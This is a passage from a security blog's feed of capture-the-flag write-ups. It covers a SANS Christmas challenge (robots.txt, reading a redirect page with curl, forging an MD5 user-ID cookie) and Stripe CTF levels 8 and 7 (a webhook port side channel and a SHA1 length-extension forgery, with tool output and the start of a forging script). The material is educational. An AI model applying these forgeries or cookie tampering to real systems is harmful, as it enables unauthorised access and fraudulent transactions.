&lt;p&gt;The important part here is the file to prevent indexing by search
engines. Heat Miser is talking about the robots.txt file, which tells
search engine crawlers what page they can crawl. By loading this file,
we find the wanted URL: zone-1-E919DBF1-E4FA-4141-97C4-3F38693D2161.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id2"&gt;
&lt;h3&gt;Zone 1&lt;/h3&gt;
&lt;p&gt;flag: &lt;code&gt;d8c94233daef256c42bb95bd61382e02&lt;/code&gt;&lt;/p&gt;
&lt;blockquote&gt;
We had an issue with Zone 2 and we had to temporarily remove the
link. It is now back and in full operation. We appoligize to those
living in Zone 2 as it may have gotten a tad chilly. Everything is
fully operational now.&lt;/blockquote&gt;
&lt;p&gt;Looking at the comment will give you the URL to the next zone:
zone-2-761EBBCF-099F-4DB0-B63F-9ADC61825D49&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id3"&gt;
&lt;h3&gt;Zone 2&lt;/h3&gt;
&lt;p&gt;flag: &lt;code&gt;ef963731de7e886226fe4a6a6c2971f1&lt;/code&gt;&lt;/p&gt;
&lt;blockquote&gt;
We are sorry, but due to the negligence of one of our fiery minions,
we had to change the link for Zone 3. If you should have access then
you should have received an email. The new zone 3 link starts with
zone-3-83FEE8BE-B1C6-4395-A56A-XXXXXXXXXXXX.&lt;/blockquote&gt;
&lt;p&gt;There are 281,474,976,710,656 possibilities for the last set of numbers,
so don't bother brute forcing it. Once again, we have an incomplete URL.
But Heat Miser tweets this message:&lt;/p&gt;
&lt;img alt="heat_miser_tweet_1.png" class="align-center" src="/images/sans-christmas-challenge-2012/heat_miser_tweet_1.png" /&gt;
&lt;p&gt;The tweeted image is:&lt;/p&gt;
&lt;img alt="heat_miser_transparent_terminal.png" class="align-center" src="/images/sans-christmas-challenge-2012/heat_miser_transparent_terminal.png" /&gt;
&lt;p&gt;And, as Snow Miser says:&lt;/p&gt;
&lt;img alt="snow_miser_tweet_2.png" class="align-center" src="/images/sans-christmas-challenge-2012/snow_miser_tweet_2.png" /&gt;
&lt;p&gt;This is looks just like the first level of Snow Miser. Using GIMP, we
can make the end of the URL appear:&lt;/p&gt;
&lt;img alt="heat_miser_transparent_terminal_enhanced.png" class="align-center" src="/images/sans-christmas-challenge-2012/heat_miser_transparent_terminal_enhanced.png" /&gt;
&lt;p&gt;Which gives us the URL: zone-3-83FEE8BE-B1C6-4395-A56A-BF933FC85254&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id4"&gt;
&lt;h3&gt;Zone 3&lt;/h3&gt;
&lt;p&gt;flag: &lt;code&gt;0d524fb8d8f9f88eb9da5b286661a824&lt;/code&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We added a new security mechanism to Zone 4 so it won't matter if
SOMEONE LEAKS IT AGAIN!&lt;/p&gt;
&lt;p&gt;Zone 4 (zone-4-0F2EA639-19BF-40DD-A38D-635E1344C02B)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We can directly access zone 4, since Heat Miser posts a link to it. But
when we click it, we're redirected to another page, noaccess.php. The
hint comes from a tweet from Snow Miser:&lt;/p&gt;
&lt;img alt="snow_miser_tweet_3.png" class="align-center" src="/images/sans-christmas-challenge-2012/snow_miser_tweet_3.png" /&gt;
&lt;p&gt;The tweeted image is from &lt;a class="reference external" href="http://knowyourmeme.com/memes/the-most-interesting-man-in-the-world"&gt;the most interesting man in the
world&lt;/a&gt;:&lt;/p&gt;
&lt;img alt="snow_miser_most_interesting_man.jpg" class="align-center" src="/images/sans-christmas-challenge-2012/snow_miser_most_interesting_man.jpg" /&gt;
&lt;p&gt;Heat Miser redirects us, using a &lt;code&gt;header(&amp;quot;location: new_url&amp;quot;);&lt;/code&gt;, but
forgets to use the &lt;code&gt;exit&lt;/code&gt; function. It
means that the rest of the page is executed, then sent to our browser,
with a Location header, which our browser follows. But if we use a
client which does not follow redirection, we can recover the first page.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;$ curl &lt;span class="s2"&gt;&amp;quot;http://heatmiser.counterhack.com/zone-4-0F2EA639-19BF-40DD-A38D-635E1344C02B/&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; grep &lt;span class="s2"&gt;&amp;quot;zone-5&amp;quot;&lt;/span&gt;
Link to &amp;lt;a &lt;span class="nv"&gt;href&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;/zone-5-15614E3A-CEA7-4A28-A85A-D688CC418287/&amp;quot;&lt;/span&gt;&amp;gt;Zone &lt;span class="m"&gt;5&lt;/span&gt;&amp;lt;/a&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="id5"&gt;
&lt;h3&gt;Zone 4&lt;/h3&gt;
&lt;p&gt;flag: &lt;code&gt;e3ae414e6d428c3b0c7cff03783e305f&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Okay, we have the URL to zone 5, but when we try to access it directly,
we're redirected again to noaccess.php. To give us a clue about where to
look, Snow Miser tweets:&lt;/p&gt;
&lt;img alt="snow_miser_tweet_4.png" class="align-center" src="/images/sans-christmas-challenge-2012/snow_miser_tweet_4.png" /&gt;
&lt;p&gt;So, we know that we should look at the cookies. There's only one:
&lt;code&gt;UID=b8c37e33defde51cf91e1e03e51657da&lt;/code&gt;. A 32 byte hex string:
it looks like a MD5 hash. If we reverse it (using online tools, or
programs like John The Ripper), we find that it's the hash of the string
&amp;quot;1001&amp;quot;, which explains Snow Miser's tweet.&lt;/p&gt;
&lt;p&gt;A value like 1001, and a name like UID indicates that this hash
corresponds to a user ID, and an unprivileged one, since he can't access
zone 5. The first value I tried was a UID of 0 (which means a MD5 of
&lt;code&gt;cfcd208495d565ef66e7dff9f98764da&lt;/code&gt;) since it's root's UID on
Linux, but it turned out that the correct value was 1 (which means a MD5
&lt;code&gt;c4ca4238a0b923820dcc509a6f75849b&lt;/code&gt;). We modify the cookie's
value, and we reload the page to access zone 5.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id6"&gt;
&lt;h3&gt;Zone 5&lt;/h3&gt;
&lt;p&gt;flag: &lt;code&gt;f478c549e37fa33467241d847f862e6f&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Game over for Southtown.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;I'll give it to you: this challenge wasn't really complicated. Mostly
because the first zones of both controllers were kinda easy, but also
because of all the hints in the tweets. Yet, I'm still glad I did it
because:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;I learned the SVN vulnerability&lt;/li&gt;
&lt;li&gt;I learned common mistakes, like forgetting &lt;code&gt;exit&lt;/code&gt; after a
redirect&lt;/li&gt;
&lt;li&gt;I added new tricks to my &amp;quot;to-do&amp;quot; list when looking for
vulnerability/information disclosure (like the use of steghide, or
looking at files in docs leaks)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I hoped this wasn't too long, and that you learned something from it. I
wish you a merry Christmas, a happy new year, and lots of pentesting ;)&lt;/p&gt;
&lt;p&gt;Cheers.&lt;/p&gt;
&lt;/div&gt;
</content></entry><entry><title>Stripe CTF: Level #8</title><link href="https://allyourbase.utouch.fr/posts/2012/12/15/stripe-ctf-level-8/" rel="alternate"></link><published>2012-12-15T20:06:00+01:00</published><updated>2012-12-15T20:06:00+01:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2012-12-15:/posts/2012/12/15/stripe-ctf-level-8/</id><summary type="html">&lt;img alt="level08-logo.jpg" class="align-center" src="/images/stripe-ctf-level-8/level08-logo.jpg" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-8/stripe-ctf-level08.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256:
&lt;code&gt;d211aa240a0a59eb1f56d3c42a55080d0e27eea2c04bc4410bf608824c847c96&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;This is it. The final level to the Stripe CTF. The goal here is to
retrieve a 12-digit password, which is too long to brute force. Let's
see how we can use the protocol to our advantage.&lt;/p&gt;
&lt;p&gt;The infrastructure …&lt;/p&gt;</summary><content type="html">&lt;img alt="level08-logo.jpg" class="align-center" src="/images/stripe-ctf-level-8/level08-logo.jpg" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-8/stripe-ctf-level08.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256:
&lt;code&gt;d211aa240a0a59eb1f56d3c42a55080d0e27eea2c04bc4410bf608824c847c96&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;This is it. The final level to the Stripe CTF. The goal here is to
retrieve a 12-digit password, which is too long to brute force. Let's
see how we can use the protocol to our advantage.&lt;/p&gt;
&lt;p&gt;The infrastructure looks like this:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;a central server, used to verify the password&lt;/li&gt;
&lt;li&gt;four &amp;quot;chunk&amp;quot; servers, which each knows only a part of the password&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When you send a password to the central server, it cuts it in four
pieces, and procedes like this:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;it asks the first chunk server if the first piece is correct&lt;/li&gt;
&lt;li&gt;if not, it sends a failure message to the client (and doesn't contact
any other chunk server)&lt;/li&gt;
&lt;li&gt;if it is, it asks the second chunk server if the second piece is
correct&lt;/li&gt;
&lt;li&gt;etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Furthermore, we can give the server a list of webhooks, to which it'll
send the result.&lt;/p&gt;
&lt;p&gt;Seeing the password verification protocol, I know what you're thinking:
timing attack. Seeing how much time the server takes to respond, we can
find how many chunk servers it contacted, thus how many chunk we
&lt;span class="formula"&gt;10&lt;sup&gt;12&lt;/sup&gt;&lt;/span&gt; possibilities, we're down to
&lt;span class="formula"&gt;4 × 10&lt;sup&gt;3&lt;/sup&gt;&lt;/span&gt; possibilities, which is feasible.&lt;/p&gt;
&lt;p&gt;The problem is that the server has a way to prevent timing attack:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;# File primary_server, line 58&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;nextServerCallback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;parsed_data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;loads&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="c1"&gt;# Chunk was wrong!&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;parsed_data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;success&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="c1"&gt;# Defend against timing attacks&lt;/span&gt;
        &lt;span class="n"&gt;remaining_time&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;expectedRemainingTime&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Going to wait &lt;/span&gt;&lt;span class="si"&gt;%s&lt;/span&gt;&lt;span class="s1"&gt; seconds before responding&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt;
        &lt;span class="n"&gt;remaining_time&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;reactor&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;callLater&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;remaining_time&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sendResult&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;

    &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;checkNext&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If a chunk is wrong, the server waits before telling the client he made
a mistake. So we can't use a timing attack.&lt;/p&gt;
&lt;p&gt;But there is another way to know how many chunk servers the primary
contacted, and thus go from &lt;span class="formula"&gt;10&lt;sup&gt;12&lt;/sup&gt;&lt;/span&gt; to &lt;span class="formula"&gt;4 × 10&lt;sup&gt;3&lt;/sup&gt;&lt;/span&gt;
the webhooks. Here is the idea:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;when the primary server communicates with an external resource
(whether it's a chunk server or a webhook), it opens a socket&lt;/li&gt;
&lt;li&gt;every time the primary server opens a socket, its client port is
incremented by one&lt;/li&gt;
&lt;li&gt;the webhook knows the client port of the primary server&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So, by looking at how much was the client port incremented between two
responses, the webhook knows how many chunk servers were contacted.
Indeed, let's say the first chunk is wrong: the primary server connects
to the first chunk server, then to the webhook. The port is therefore
incremented by two. If the first chunk is correct, but not the second is
wrong, the primary servers contacts the first chunk server, the second
chunk server, then the webhook. The port is incremented by three, etc.&lt;/p&gt;
&lt;p&gt;So, knowing this we can't find the correct chunks, but we can eliminate
the bad chunks, which is faster than bruteforcing the whole password,
but still takes a lot of time. What's more, the primary server can only
contact webhooks with URL ending with .stripe-ctf.com (in the production
environment). Fortunately, we still have access to the level 2 server
(remember, the one with the upload vulnerability?) We can upload an SSH
key, connect, and then launch our webhook.&lt;/p&gt;
&lt;p&gt;Unfortunately, I lost the source code of my custom webhook (sorry about
that!). It was based on a webhook coded by a friend of Lopi. Basically,
it tried every possible combination, chunk by chunk, and eliminated the
bad ones as it did so.&lt;/p&gt;
&lt;p&gt;The attack took something like two days, because I kept being
disconnected of the server, and because there were so many people on it
running their own webhook. I think it was kind of stubborn from Stripe
to force the webhook to be on one of their server.&lt;/p&gt;
&lt;img alt="level08-scumbag-stripe.png" class="align-center" src="/images/stripe-ctf-level-8/level08-scumbag-stripe.png" /&gt;
&lt;p&gt;Anyway, after some time, you find the correct password, which you submit
to the Stripe web site.&lt;/p&gt;
&lt;img alt="level08-w00t.png" class="align-center" src="/images/stripe-ctf-level-8/level08-w00t.png" /&gt;
&lt;p&gt;w00t!&lt;/p&gt;
&lt;p&gt;That's it for the Stripe CTF! I know I took a lot of time writing these
write ups, but I learned a lot from this competition, especially the
SHA1 padding attack, how to find where to put my Javascript so it's
executed, and how to obfuscate it. Plus I won a super cool t-shirt!&lt;/p&gt;
&lt;p&gt;See you for another CTF!&lt;/p&gt;
&lt;img alt="stripe-ctf-prize.jpg" class="align-center" src="/images/stripe-ctf-level-8/stripe-ctf-prize.jpg" /&gt;
</content></entry><entry><title>Stripe CTF: Level #7</title><link href="https://allyourbase.utouch.fr/posts/2012/12/09/stripe-ctf-level-7/" rel="alternate"></link><published>2012-12-09T15:07:00+01:00</published><updated>2012-12-09T15:07:00+01:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2012-12-09:/posts/2012/12/09/stripe-ctf-level-7/</id><summary type="html">&lt;img alt="level07-logo.jpg" class="align-center" src="/images/stripe-ctf-level-7/level07-logo.jpg" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-7/stripe-ctf-level07.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256:
&lt;code&gt;d497f25a620a2ad5e3850bf642cfc1df988e32b612d06f48fffa271912726e86&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;This level is the most delicious of all: you can order waffles online,
and the company will have them delivered to the location you specified.
There are seven types of waffle: veritaffle, belgian, brussels, eggo,
chicken (premium), dream (premium …&lt;/p&gt;</summary><content type="html">&lt;img alt="level07-logo.jpg" class="align-center" src="/images/stripe-ctf-level-7/level07-logo.jpg" /&gt;
&lt;p&gt;You can find the code for this level
&lt;a class="reference external" href="/docs/stripe-ctf-level-7/stripe-ctf-level07.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;(sha256:
&lt;code&gt;d497f25a620a2ad5e3850bf642cfc1df988e32b612d06f48fffa271912726e86&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;This level is the most delicious of all: you can order waffles online,
and the company will have them delivered to the location you specified.
There are seven types of waffle: veritaffle, belgian, brussels, eggo,
chicken (premium), dream (premium), and the king of waffles, liege
(premium). You have an unprivileged account (login: ctf, password:
password), so you can't order premium waffles. Yet, your goal is to
order the supreme waffle: the liege. There are four other users on the
website: larry (premium account), randall (premium account), alice and
bob. Every user has an ID, and a secret (which has the form of a random
string).&lt;/p&gt;
&lt;img alt="level07-ctf-user-interface.png" class="align-center" src="/images/stripe-ctf-level-7/level07-ctf-user-interface.png" /&gt;
&lt;p&gt;The company provides you with a client API you can use to order waffles.
Every order is of the form:
&lt;code&gt;count=XXX&amp;amp;lat=XXX&amp;amp;user_id=XXX&amp;amp;long=XXX&amp;amp;waffle=XXX&lt;/code&gt;. Then, a
signature is computed using the client's secret, and appended to the
order. The signature is of the form:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;# File client.py, line 61&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;_signature&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;h&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;hashlib&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sha1&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;api_secret&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hexdigest&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="c1"&gt;# signature = SHA1(secret + message)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can view our past orders at the URL /logs/id.&lt;/p&gt;
&lt;img alt="level07-ctf-order.png" class="align-center" src="/images/stripe-ctf-level-7/level07-ctf-order.png" /&gt;
&lt;p&gt;But what if we change the ID in the URL?&lt;/p&gt;
&lt;img alt="level07-larry-order.png" class="align-center" src="/images/stripe-ctf-level-7/level07-larry-order.png" /&gt;
&lt;img alt="level07-barry-order.png" class="align-center" src="/images/stripe-ctf-level-7/level07-barry-order.png" /&gt;
&lt;p&gt;Bingo, we are now viewing larry's and randall's past orders. But since
they didn't order any liege, we can't use these orders as is. Let's see
in the code how the order is checked:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;# File wafflecopter.py, line 139&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;parse_params&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;raw_params&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;pairs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;raw_params&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;amp;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;params&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;pair&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;pairs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pair&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;urllib&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;unquote_plus&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;urllib&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;unquote_plus&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;val&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That's the code which parse the body of the order. We can see that they
don't check if a parameter has been specified more than once. So if you
send an order of the form: &lt;code&gt;count=XXX&amp;amp;lat=XXX&amp;amp;user_id=XXX&amp;amp;long=XXX&amp;amp;waffle=XXX&amp;amp;waffle=YYY&lt;/code&gt;,
the last waffle will be ordered (in this case, YYY).&lt;/p&gt;
&lt;p&gt;Great, so we can just take a previous order from larry, append
&lt;code&gt;&amp;amp;waffle=liege&lt;/code&gt; to the end, and send it to the server!
Actually, we can't, because of the signature: if we change the order,
but not the signature, they won't match, and the server will refuse to
carry our order. So we need to change the signature. But how can we do
that without knowing larry's secret? The key here is cryptography.&lt;/p&gt;
&lt;p&gt;Like we said earlier, the signature is computed via &lt;code&gt;SHA1(secret +
message)&lt;/code&gt;. But the SHA1 function follows the &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Merkle%E2%80%93Damg%C3%A5rd_construction"&gt;Merkle–Damgård
construction&lt;/a&gt;.
Basically, the message is broken up in equal blocks of 512 bits. Then,
computation is done on the first block and produces an output. This
output is used to perform the same computation on the second block, and
so on. So, it means that given &lt;code&gt;SHA1(secret + message)&lt;/code&gt; and the
and the length of &lt;code&gt;secret&lt;/code&gt;, we can compute &lt;code&gt;SHA1(secret + message +
message_modifier)&lt;/code&gt;. And that's exactly what we want, to append
something (here, &lt;code&gt;&amp;amp;waffle=liege&lt;/code&gt;) at the end of the message.&lt;/p&gt;
&lt;p&gt;I started searching for a Python implementation of SHA1, and wanted to
modify it so that it would compute my forged signature, but it took too
much time. Fortunately, two guys I was working with on the CTF,
&lt;a class="reference external" href="https://twitter.com/_Lopi_"&gt;lopi&lt;/a&gt; and mark, found a script that
could forge the signature for us. The script was taken down since then,
but you can find another working one &lt;a class="reference external" href="https://gist.github.com/philfreo/3873715"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; python sha-padding.py
&lt;span class="go"&gt;usage: sha-padding.py &amp;lt;keylen&amp;gt; &amp;lt;original_message&amp;gt; &amp;lt;original_signature&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;text_to_append&amp;gt;&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; python sha-padding.py &lt;span class="m"&gt;14&lt;/span&gt;
&lt;span class="go"&gt;&amp;quot;count=10&amp;amp;lat=37.351&amp;amp;user_id=1&amp;amp;long=-119.827&amp;amp;waffle=eggo&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;78943cff885d4b41ff058aa64a36520e66ffdbbe &amp;quot;&amp;amp;waffle=liege&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;new msg:&lt;/span&gt;
&lt;span class="go"&gt;&amp;#39;count=10&amp;amp;lat=37.351&amp;amp;user_id=1&amp;amp;long=-119.827&amp;amp;waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&amp;amp;waffle=liege&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;base64:&lt;/span&gt;
&lt;span class="go"&gt;Y291bnQ9MTAmbGF0PTM3LjM1MSZ1c2VyX2lkPTEmbG9uZz0tMTE5LjgyNyZ3YWZmbGU9ZWdnb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIoJndhZmZsZT1saWVnZQ==&lt;/span&gt;
&lt;span class="go"&gt;new sig: f7d4b492cc3282cd87e61624ee207ca496e807e4&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, we just have to make the order:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;# File forged_client.py&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;pycurl&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;urllib&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;StringIO&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;order&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;endpoint&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;http://localhost:9233&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;body&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;count=10&amp;amp;lat=37.351&amp;amp;user_id=1&amp;amp;long=-119.827&amp;amp;waffle=eggo&lt;/span&gt;&lt;span class="se"&gt;\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02&lt;/span&gt;&lt;span class="s1"&gt;(&amp;amp;waffle=liege&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;signature&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;f7d4b492cc3282cd87e61624ee207ca496e807e4&amp;#39;&lt;/span&gt;
